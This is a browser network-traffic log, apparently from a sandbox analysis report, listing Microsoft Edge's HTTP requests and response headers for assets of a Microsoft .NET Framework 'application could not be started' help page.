                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 0nlsoZQAAAADPuVaQFNmMSK8WqWOzl03yQlJVMzBFREdFMTAyMAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
                                                                                                                content-length: 12551
                                                                                                                cache-control: public, max-age=600
                                                                                                                expires: Thu, 12 Oct 2023 20:58:30 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:30 GMT
                                                                                                                akamai-cache-status: Miss from child, Miss from parent
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/fe274a7f.site-ltr.css
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /_themes/docs.theme/master/en-us/_themes/styles/fe274a7f.site-ltr.css HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: text/css,*/*;q=0.1
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: no-cors
                                                                                                                sec-fetch-dest: style
                                                                                                                referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-length: 68087
                                                                                                                content-type: text/css
                                                                                                                content-encoding: gzip
                                                                                                                last-modified: Thu, 12 Oct 2023 02:15:52 GMT
                                                                                                                etag: "0x8DBCAC928F64F5F"
                                                                                                                request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
                                                                                                                x-datacenter: eus
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-ua-compatible: IE=edge
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 0h1cnZQAAAACy+6jKLcrSQby7F8wTmDtCQlJVMzBFREdFMDcwOQA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
                                                                                                                vary: Accept-Encoding
                                                                                                                cache-control: public, max-age=538199
                                                                                                                expires: Thu, 19 Oct 2023 02:18:31 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:32 GMT
                                                                                                                akamai-cache-status: Hit from child
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/static/third-party/adobe-target/at-js/2.9.0/at.js
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /static/third-party/adobe-target/at-js/2.9.0/at.js HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                origin: https://learn.microsoft.com
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                dnt: 1
                                                                                                                accept: */*
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: cors
                                                                                                                sec-fetch-dest: script
                                                                                                                referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-type: application/javascript
                                                                                                                content-encoding: gzip
                                                                                                                content-md5: p2plPaqhNrF9OruIDBWWBg==
                                                                                                                last-modified: Thu, 30 Mar 2023 19:40:20 GMT
                                                                                                                etag: 0x8DB315698C00FE5
                                                                                                                x-ms-request-id: e54572c4-501e-0073-7f4e-67bf51000000
                                                                                                                x-ms-version: 2009-09-19
                                                                                                                x-ms-lease-status: unlocked
                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                access-control-allow-origin: *
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}{"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=static"}]}{"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 0SLUsZAAAAAAzmaciykciRJbMlrdBtIVnQU1TMDRFREdFMTkxNgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
                                                                                                                x-content-type-options: nosniff
                                                                                                                content-length: 33794
                                                                                                                vary: Accept-Encoding
                                                                                                                cache-control: max-age=17784566
                                                                                                                expires: Sun, 05 May 2024 16:57:58 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:32 GMT
                                                                                                                akamai-cache-status: Hit from child
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/global/67a45209.deprecation.js
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /_themes/docs.theme/master/en-us/_themes/global/67a45209.deprecation.js HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: */*
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: no-cors
                                                                                                                sec-fetch-dest: script
                                                                                                                referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-length: 588
                                                                                                                content-type: application/javascript
                                                                                                                content-encoding: gzip
                                                                                                                last-modified: Mon, 09 Oct 2023 21:01:25 GMT
                                                                                                                etag: "0x8DBC90AE65B8137"
                                                                                                                request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
                                                                                                                x-datacenter: eus
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-ua-compatible: IE=edge
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 0VdIlZQAAAADOjHxJn07wSp01YEDyrYVbQlJVMzBFREdFMTExNAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
                                                                                                                vary: Accept-Encoding
                                                                                                                cache-control: public, max-age=438614
                                                                                                                expires: Tue, 17 Oct 2023 22:38:46 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:32 GMT
                                                                                                                akamai-cache-status: Hit from child
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/scripts/f5d007b1.index-docs.js
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /_themes/docs.theme/master/en-us/_themes/scripts/f5d007b1.index-docs.js HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: */*
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: no-cors
                                                                                                                sec-fetch-dest: script
                                                                                                                referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-type: application/javascript
                                                                                                                content-length: 611993
                                                                                                                content-encoding: gzip
                                                                                                                etag: "0x8DBCAC928D6BE0E"
                                                                                                                last-modified: Thu, 12 Oct 2023 02:15:52 GMT
                                                                                                                request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
                                                                                                                x-datacenter: eus
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-ua-compatible: IE=edge
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 20231012T021730Z-up30fm0yzp6thf1r3v66mdsbgs000000071g00000001ez79
                                                                                                                accept-ranges: bytes
                                                                                                                vary: Accept-Encoding
                                                                                                                cache-control: public, max-age=538102
                                                                                                                expires: Thu, 19 Oct 2023 02:16:54 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:32 GMT
                                                                                                                akamai-cache-status: Hit from child
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /static/third-party/MathJax/3.2.2/tex-mml-chtml.js HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                origin: https://learn.microsoft.com
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                dnt: 1
                                                                                                                accept: */*
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: cors
                                                                                                                sec-fetch-dest: script
                                                                                                                referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-type: application/javascript
                                                                                                                content-encoding: gzip
                                                                                                                content-md5: LgDVHJjbszjoEFTyQOHesg==
                                                                                                                last-modified: Wed, 20 Sep 2023 23:31:57 GMT
                                                                                                                etag: 0x8DBBA31C829D526
                                                                                                                x-ms-request-id: 46f6f1ff-601e-0013-232a-f2fdd8000000
                                                                                                                x-ms-version: 2009-09-19
                                                                                                                x-ms-lease-status: unlocked
                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                x-azure-ref-originshield: 0WKwVZQAAAAA3Esd26EFaSo+eaMvCT+R0QU1TMDRFREdFMTgwNgA0NGU4ZTUwNy00YmE1LTRiNzAtODcwYS0yODA4NDM4ZDZiMmI=
                                                                                                                access-control-allow-origin: *
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}{"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=static"}]}{"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 0WKwVZQAAAACZkpucdi9lQogXOsGBmhSBQlJVMzBFREdFMTExMAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
                                                                                                                x-content-type-options: nosniff
                                                                                                                content-length: 265844
                                                                                                                vary: Accept-Encoding
                                                                                                                cache-control: max-age=30311536
                                                                                                                expires: Fri, 27 Sep 2024 16:40:48 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:32 GMT
                                                                                                                akamai-cache-status: Hit from child
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: no-cors
                                                                                                                sec-fetch-dest: image
                                                                                                                referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-type: image/png
                                                                                                                content-length: 35005
                                                                                                                etag: "0x8D8E3CB30F4C3E2"
                                                                                                                last-modified: Wed, 10 Mar 2021 13:48:31 GMT
                                                                                                                request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
                                                                                                                x-datacenter: eus
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-ua-compatible: IE=edge
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                x-rendering-stack: Static
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 20230628T081959Z-kxtvra8dxd7c71tecefzzq90a000000001ng000000013q0b
                                                                                                                accept-ranges: bytes
                                                                                                                cache-control: public, max-age=1242
                                                                                                                expires: Thu, 12 Oct 2023 21:09:15 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:33 GMT
                                                                                                                akamai-cache-status: Hit from child
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: no-cors
                                                                                                                sec-fetch-dest: image
                                                                                                                referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-length: 15427
                                                                                                                content-type: image/png
                                                                                                                last-modified: Wed, 10 Mar 2021 13:48:40 GMT
                                                                                                                etag: "0x8D8E3CB365AA10A"
                                                                                                                request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
                                                                                                                x-datacenter: eus
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-ua-compatible: IE=edge
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                x-rendering-stack: Static
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 0MlZTZAAAAAAwEAB12lP/S4ByhCc8+Y3mQU1TMDRFREdFMTgxNAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
                                                                                                                cache-control: public, max-age=1753
                                                                                                                expires: Thu, 12 Oct 2023 21:17:46 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:33 GMT
                                                                                                                akamai-cache-status: Hit from child
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /en-us/content-nav/MSDocsHeader-DotNet.json? HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: */*
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: cors
                                                                                                                sec-fetch-dest: empty
                                                                                                                referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-length: 874
                                                                                                                content-type: application/json
                                                                                                                content-encoding: gzip
                                                                                                                last-modified: Fri, 04 Aug 2023 16:48:26 GMT
                                                                                                                etag: "0x8DB950A9F96B229"
                                                                                                                request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
                                                                                                                x-datacenter: eus
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-ua-compatible: IE=edge
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                x-rendering-stack: Static
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 0GGTRZAAAAADnHxz+yJAGRZvE4cn0SLgVQU1TMDRFREdFMTgxNwA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
                                                                                                                vary: Accept-Encoding
                                                                                                                cache-control: public, max-age=276
                                                                                                                expires: Thu, 12 Oct 2023 20:53:10 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:34 GMT
                                                                                                                akamai-cache-status: Hit from child
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /en-us/dotnet/framework/toc.json HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: */*
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: cors
                                                                                                                sec-fetch-dest: empty
                                                                                                                referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-length: 6943
                                                                                                                content-type: application/json
                                                                                                                content-encoding: gzip
                                                                                                                last-modified: Wed, 27 Sep 2023 23:31:55 GMT
                                                                                                                etag: "0x8DBBFB1EFF5709E"
                                                                                                                request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
                                                                                                                x-datacenter: eus
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-ua-compatible: IE=edge
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                x-rendering-stack: Static
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 0ar4WZQAAAAAlJ4z8xhHwQqzM1ssQe8wqQlJVMzBFREdFMDcxNwA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
                                                                                                                vary: Accept-Encoding
                                                                                                                cache-control: public, max-age=552
                                                                                                                expires: Thu, 12 Oct 2023 20:57:46 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:34 GMT
                                                                                                                akamai-cache-status: Hit from child
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /en-us/dotnet/breadcrumb/toc.json HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: */*
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: cors
                                                                                                                sec-fetch-dest: empty
                                                                                                                referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-length: 4814
                                                                                                                content-type: application/json
                                                                                                                content-encoding: gzip
                                                                                                                last-modified: Wed, 27 Sep 2023 23:32:01 GMT
                                                                                                                etag: "0x8DBBFB1F37EB5B9"
                                                                                                                request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
                                                                                                                x-datacenter: eus
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-ua-compatible: IE=edge
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                x-rendering-stack: Static
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 06r0WZQAAAACBkVeWAo5GQJjdukDu+Me6QU1TMDRFREdFMTkyMgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
                                                                                                                vary: Accept-Encoding
                                                                                                                cache-control: public, max-age=306
                                                                                                                expires: Thu, 12 Oct 2023 20:53:40 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:34 GMT
                                                                                                                akamai-cache-status: Hit from child
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
                                                                                                                https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.85.2.139:443
                                                                                                                Request
                                                                                                                GET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png HTTP/2.0
                                                                                                                host: learn.microsoft.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                sec-fetch-site: same-origin
                                                                                                                sec-fetch-mode: no-cors
                                                                                                                sec-fetch-dest: image
                                                                                                                referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-length: 13339
                                                                                                                content-type: image/png
                                                                                                                last-modified: Wed, 10 Mar 2021 13:48:35 GMT
                                                                                                                etag: "0x8D8E3CB33C8B874"
                                                                                                                request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
                                                                                                                x-datacenter: eus
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                x-content-type-options: nosniff
                                                                                                                x-ua-compatible: IE=edge
                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                x-rendering-stack: Static
                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
                                                                                                                x-azure-ref: 0pnCMZAAAAADdTbBS7UHnRZ6AZnqhm94IQlJVMzBFREdFMTEyMAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
                                                                                                                cache-control: public, max-age=1604
                                                                                                                expires: Thu, 12 Oct 2023 21:15:18 GMT
                                                                                                                date: Thu, 12 Oct 2023 20:48:34 GMT
                                                                                                                akamai-cache-status: Hit from child
                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                              • flag-nl
                                                                                                                GET
